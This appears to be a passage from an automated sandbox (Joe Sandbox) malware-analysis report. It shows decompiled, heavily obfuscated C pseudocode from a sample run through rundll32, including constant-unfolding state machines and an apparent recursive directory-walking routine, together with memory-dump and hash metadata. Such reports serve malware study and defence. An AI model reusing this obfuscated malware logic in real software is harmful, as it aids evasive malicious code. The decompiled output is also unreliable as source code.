				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E002EDA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E002DB6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E002D8969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E002D47CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E002EDCF7(_v2692, 0x2d1308, _t480),  &_v1560, _v2616, _v2636);
							E002DA8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E002DEA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E002E46BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E002D47CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E002EDCF7(_v2640, 0x2d13b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E002DA8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E002DAB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}





























































                                                                                                                                  0x002e0e53
                                                                                                                                  0x002e0e59
                                                                                                                                  0x002e0e63
                                                                                                                                  0x002e0e68
                                                                                                                                  0x002e0e70
                                                                                                                                  0x002e0e78
                                                                                                                                  0x002e0e80
                                                                                                                                  0x002e0e89
                                                                                                                                  0x002e0e90
                                                                                                                                  0x002e0e92
                                                                                                                                  0x002e0e9d
                                                                                                                                  0x002e0ea2
                                                                                                                                  0x002e0ead
                                                                                                                                  0x002e0eb8
                                                                                                                                  0x002e0ec3
                                                                                                                                  0x002e0ecb
                                                                                                                                  0x002e0ed3
                                                                                                                                  0x002e0edb
                                                                                                                                  0x002e0ee3
                                                                                                                                  0x002e0eeb
                                                                                                                                  0x002e0ef3
                                                                                                                                  0x002e0ef8
                                                                                                                                  0x002e0f00
                                                                                                                                  0x002e0f08
                                                                                                                                  0x002e0f10
                                                                                                                                  0x002e0f18
                                                                                                                                  0x002e0f20
                                                                                                                                  0x002e0f28
                                                                                                                                  0x002e0f30
                                                                                                                                  0x002e0f38
                                                                                                                                  0x002e0f43
                                                                                                                                  0x002e0f4e
                                                                                                                                  0x002e0f59
                                                                                                                                  0x002e0f61
                                                                                                                                  0x002e0f69
                                                                                                                                  0x002e0f71
                                                                                                                                  0x002e0f80
                                                                                                                                  0x002e0f83
                                                                                                                                  0x002e0f87
                                                                                                                                  0x002e0f8c
                                                                                                                                  0x002e0f91
                                                                                                                                  0x002e0f99
                                                                                                                                  0x002e0fa4
                                                                                                                                  0x002e0faf
                                                                                                                                  0x002e0fba
                                                                                                                                  0x002e0fc2
                                                                                                                                  0x002e0fc7
                                                                                                                                  0x002e0fcf
                                                                                                                                  0x002e0fd7
                                                                                                                                  0x002e0fdf
                                                                                                                                  0x002e0fe9
                                                                                                                                  0x002e0fed
                                                                                                                                  0x002e0ff5
                                                                                                                                  0x002e1000
                                                                                                                                  0x002e1008
                                                                                                                                  0x002e1013
                                                                                                                                  0x002e1020
                                                                                                                                  0x002e1024
                                                                                                                                  0x002e102c
                                                                                                                                  0x002e1034
                                                                                                                                  0x002e103c
                                                                                                                                  0x002e104c
                                                                                                                                  0x002e1050
                                                                                                                                  0x002e1058
                                                                                                                                  0x002e1060
                                                                                                                                  0x002e1072
                                                                                                                                  0x002e1075
                                                                                                                                  0x002e107c
                                                                                                                                  0x002e1089
                                                                                                                                  0x002e1094
                                                                                                                                  0x002e109f
                                                                                                                                  0x002e10aa
                                                                                                                                  0x002e10bf
                                                                                                                                  0x002e10c2
                                                                                                                                  0x002e10c9
                                                                                                                                  0x002e10d4
                                                                                                                                  0x002e10df
                                                                                                                                  0x002e10e6
                                                                                                                                  0x002e10f1
                                                                                                                                  0x002e10f9
                                                                                                                                  0x002e1105
                                                                                                                                  0x002e1109
                                                                                                                                  0x002e110e
                                                                                                                                  0x002e1116
                                                                                                                                  0x002e1121
                                                                                                                                  0x002e112c
                                                                                                                                  0x002e1137
                                                                                                                                  0x002e113f
                                                                                                                                  0x002e1144
                                                                                                                                  0x002e114c
                                                                                                                                  0x002e1154
                                                                                                                                  0x002e115f
                                                                                                                                  0x002e116a
                                                                                                                                  0x002e1175
                                                                                                                                  0x002e117d
                                                                                                                                  0x002e1185
                                                                                                                                  0x002e118a
                                                                                                                                  0x002e1192
                                                                                                                                  0x002e119a
                                                                                                                                  0x002e11a2
                                                                                                                                  0x002e11aa
                                                                                                                                  0x002e11b7
                                                                                                                                  0x002e11ba
                                                                                                                                  0x002e11be
                                                                                                                                  0x002e11c6
                                                                                                                                  0x002e11ce
                                                                                                                                  0x002e11d3
                                                                                                                                  0x002e11db
                                                                                                                                  0x002e11e3
                                                                                                                                  0x002e11eb
                                                                                                                                  0x002e11f0
                                                                                                                                  0x002e11f5
                                                                                                                                  0x002e11fd
                                                                                                                                  0x002e1205
                                                                                                                                  0x002e1215
                                                                                                                                  0x002e1219
                                                                                                                                  0x002e1222
                                                                                                                                  0x002e1227
                                                                                                                                  0x002e122d
                                                                                                                                  0x002e1235
                                                                                                                                  0x002e1247
                                                                                                                                  0x002e124a
                                                                                                                                  0x002e1251
                                                                                                                                  0x002e125c
                                                                                                                                  0x002e1267
                                                                                                                                  0x002e126f
                                                                                                                                  0x002e127a
                                                                                                                                  0x002e1282
                                                                                                                                  0x002e128a
                                                                                                                                  0x002e1292
                                                                                                                                  0x002e129a
                                                                                                                                  0x002e12a7
                                                                                                                                  0x002e12b9
                                                                                                                                  0x002e12bd
                                                                                                                                  0x002e12c2
                                                                                                                                  0x002e12c7
                                                                                                                                  0x002e12cf
                                                                                                                                  0x002e12d7
                                                                                                                                  0x002e12e1
                                                                                                                                  0x002e12e5
                                                                                                                                  0x002e12ed
                                                                                                                                  0x002e12f5
                                                                                                                                  0x002e12f9
                                                                                                                                  0x002e1301
                                                                                                                                  0x002e1309
                                                                                                                                  0x002e1311
                                                                                                                                  0x002e1319
                                                                                                                                  0x002e1321
                                                                                                                                  0x002e1325
                                                                                                                                  0x002e132d
                                                                                                                                  0x002e133a
                                                                                                                                  0x002e133e
                                                                                                                                  0x002e1343
                                                                                                                                  0x002e134b
                                                                                                                                  0x002e1353
                                                                                                                                  0x002e135b
                                                                                                                                  0x002e1365
                                                                                                                                  0x002e1369
                                                                                                                                  0x002e1371
                                                                                                                                  0x002e137c
                                                                                                                                  0x002e1387
                                                                                                                                  0x002e1392
                                                                                                                                  0x002e139f
                                                                                                                                  0x002e13a3
                                                                                                                                  0x002e13ab
                                                                                                                                  0x002e13b3
                                                                                                                                  0x002e13bb
                                                                                                                                  0x002e13c0
                                                                                                                                  0x002e13c5
                                                                                                                                  0x002e13c9
                                                                                                                                  0x002e13d1
                                                                                                                                  0x002e13d9
                                                                                                                                  0x002e13e4
                                                                                                                                  0x002e13ef
                                                                                                                                  0x002e13fa
                                                                                                                                  0x002e1402
                                                                                                                                  0x002e140a
                                                                                                                                  0x002e1412
                                                                                                                                  0x002e141a
                                                                                                                                  0x002e1422
                                                                                                                                  0x002e142a
                                                                                                                                  0x002e1432
                                                                                                                                  0x002e143a
                                                                                                                                  0x002e1442
                                                                                                                                  0x002e144a
                                                                                                                                  0x002e1458
                                                                                                                                  0x002e1572
                                                                                                                                  0x00000000
                                                                                                                                  0x002e145e
                                                                                                                                  0x002e145e
                                                                                                                                  0x002e1460
                                                                                                                                  0x002e163b
                                                                                                                                  0x002e163b
                                                                                                                                  0x002e1641
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e1466
                                                                                                                                  0x002e1485
                                                                                                                                  0x002e14bc
                                                                                                                                  0x002e14c3
                                                                                                                                  0x002e14c8
                                                                                                                                  0x002e14d1
                                                                                                                                  0x002e1524
                                                                                                                                  0x002e1536
                                                                                                                                  0x002e1554
                                                                                                                                  0x002e155b
                                                                                                                                  0x002e1560
                                                                                                                                  0x002e1565
                                                                                                                                  0x002e156b
                                                                                                                                  0x00000000
                                                                                                                                  0x002e156b
                                                                                                                                  0x002e1565
                                                                                                                                  0x002e1460
                                                                                                                                  0x002e1651
                                                                                                                                  0x002e1651
                                                                                                                                  0x002e1579
                                                                                                                                  0x002e1587
                                                                                                                                  0x002e158b
                                                                                                                                  0x002e159a
                                                                                                                                  0x002e159b
                                                                                                                                  0x002e15a0
                                                                                                                                  0x002e15a9
                                                                                                                                  0x002e15f0
                                                                                                                                  0x002e15fc
                                                                                                                                  0x002e1605
                                                                                                                                  0x002e160d
                                                                                                                                  0x002e160f
                                                                                                                                  0x002e1613
                                                                                                                                  0x002e1614
                                                                                                                                  0x002e1615
                                                                                                                                  0x002e1616
                                                                                                                                  0x002e1617
                                                                                                                                  0x002e1629
                                                                                                                                  0x002e162d
                                                                                                                                  0x002e162e
                                                                                                                                  0x002e1633
                                                                                                                                  0x002e1636
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Fo$M_o9$[K
                                                                                                                                  • API String ID: 0-3743190696
                                                                                                                                  • Opcode ID: 1252f9bc5223e80d5a008b0fd729ab64064713a92057b2e11f5589b4e88bc572
                                                                                                                                  • Instruction ID: 734fa5b7f4af0106c9446b2eaa5c47529fcfaddaf8bd2a4ed066c9a5975d138a
                                                                                                                                  • Opcode Fuzzy Hash: 1252f9bc5223e80d5a008b0fd729ab64064713a92057b2e11f5589b4e88bc572
                                                                                                                                  • Instruction Fuzzy Hash: 6D120DB1409381CFD3A8CF21C58AA9BBBF1FBC4748F50891DE59A96260D7B18919CF53
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D9DCF Relevance: 4.1, Strings: 3, Instructions: 315COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                  			E002D9DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E002EDCF7(_v80, 0x2d17a0, __eflags);
									_pop(_t327);
									E002D47CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E002D9DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E002DA8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E002DA918(_t317, __eflags, _v8, _v96, E002EDCF7(_v56, 0x2d1770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E002DA8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E002D7E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E002D4635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E002D8ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}


























































                                                                                                                                  0x002d9dd9
                                                                                                                                  0x002d9dde
                                                                                                                                  0x002d9de1
                                                                                                                                  0x002d9de4
                                                                                                                                  0x002d9de7
                                                                                                                                  0x002d9de8
                                                                                                                                  0x002d9deb
                                                                                                                                  0x002d9dee
                                                                                                                                  0x002d9def
                                                                                                                                  0x002d9df0
                                                                                                                                  0x002d9df5
                                                                                                                                  0x002d9dfc
                                                                                                                                  0x002d9dff
                                                                                                                                  0x002d9e08
                                                                                                                                  0x002d9e0f
                                                                                                                                  0x002d9e14
                                                                                                                                  0x002d9e1b
                                                                                                                                  0x002d9e22
                                                                                                                                  0x002d9e25
                                                                                                                                  0x002d9e2c
                                                                                                                                  0x002d9e33
                                                                                                                                  0x002d9e3f
                                                                                                                                  0x002d9e44
                                                                                                                                  0x002d9e49
                                                                                                                                  0x002d9e50
                                                                                                                                  0x002d9e57
                                                                                                                                  0x002d9e5e
                                                                                                                                  0x002d9e65
                                                                                                                                  0x002d9e70
                                                                                                                                  0x002d9e71
                                                                                                                                  0x002d9e74
                                                                                                                                  0x002d9e7f
                                                                                                                                  0x002d9e82
                                                                                                                                  0x002d9e89
                                                                                                                                  0x002d9e90
                                                                                                                                  0x002d9e97
                                                                                                                                  0x002d9e9e
                                                                                                                                  0x002d9ea9
                                                                                                                                  0x002d9eac
                                                                                                                                  0x002d9eb3
                                                                                                                                  0x002d9eba
                                                                                                                                  0x002d9ebe
                                                                                                                                  0x002d9ec5
                                                                                                                                  0x002d9ed1
                                                                                                                                  0x002d9ed8
                                                                                                                                  0x002d9edb
                                                                                                                                  0x002d9ee2
                                                                                                                                  0x002d9ee9
                                                                                                                                  0x002d9ef0
                                                                                                                                  0x002d9ef7
                                                                                                                                  0x002d9efe
                                                                                                                                  0x002d9f02
                                                                                                                                  0x002d9f09
                                                                                                                                  0x002d9f10
                                                                                                                                  0x002d9f17
                                                                                                                                  0x002d9f1e
                                                                                                                                  0x002d9f25
                                                                                                                                  0x002d9f2c
                                                                                                                                  0x002d9f33
                                                                                                                                  0x002d9f3a
                                                                                                                                  0x002d9f41
                                                                                                                                  0x002d9f48
                                                                                                                                  0x002d9f4f
                                                                                                                                  0x002d9f56
                                                                                                                                  0x002d9f5d
                                                                                                                                  0x002d9f64
                                                                                                                                  0x002d9f6b
                                                                                                                                  0x002d9f71
                                                                                                                                  0x002d9f78
                                                                                                                                  0x002d9f7f
                                                                                                                                  0x002d9f86
                                                                                                                                  0x002d9f92
                                                                                                                                  0x002d9f97
                                                                                                                                  0x002d9f9c
                                                                                                                                  0x002d9fa3
                                                                                                                                  0x002d9faa
                                                                                                                                  0x002d9fb1
                                                                                                                                  0x002d9fbc
                                                                                                                                  0x002d9fbf
                                                                                                                                  0x002d9fc2
                                                                                                                                  0x002d9fc9
                                                                                                                                  0x002d9fd0
                                                                                                                                  0x002d9fde
                                                                                                                                  0x002d9fe1
                                                                                                                                  0x002d9fe8
                                                                                                                                  0x002d9fef
                                                                                                                                  0x002d9ffa
                                                                                                                                  0x002d9ffd
                                                                                                                                  0x002da000
                                                                                                                                  0x002da007
                                                                                                                                  0x002da00e
                                                                                                                                  0x002da012
                                                                                                                                  0x002da019
                                                                                                                                  0x002da01c
                                                                                                                                  0x002da023
                                                                                                                                  0x002da02e
                                                                                                                                  0x002da038
                                                                                                                                  0x002da03b
                                                                                                                                  0x002da03f
                                                                                                                                  0x002da046
                                                                                                                                  0x002da051
                                                                                                                                  0x002da052
                                                                                                                                  0x002da055
                                                                                                                                  0x002da059
                                                                                                                                  0x002da060
                                                                                                                                  0x002da06b
                                                                                                                                  0x002da06e
                                                                                                                                  0x002da075
                                                                                                                                  0x002da07c
                                                                                                                                  0x002da083
                                                                                                                                  0x002da08a
                                                                                                                                  0x002da091
                                                                                                                                  0x002da098
                                                                                                                                  0x002da09f
                                                                                                                                  0x002da0aa
                                                                                                                                  0x002da0ad
                                                                                                                                  0x002da0b1
                                                                                                                                  0x002da0b5
                                                                                                                                  0x002da0bc
                                                                                                                                  0x002da0c8
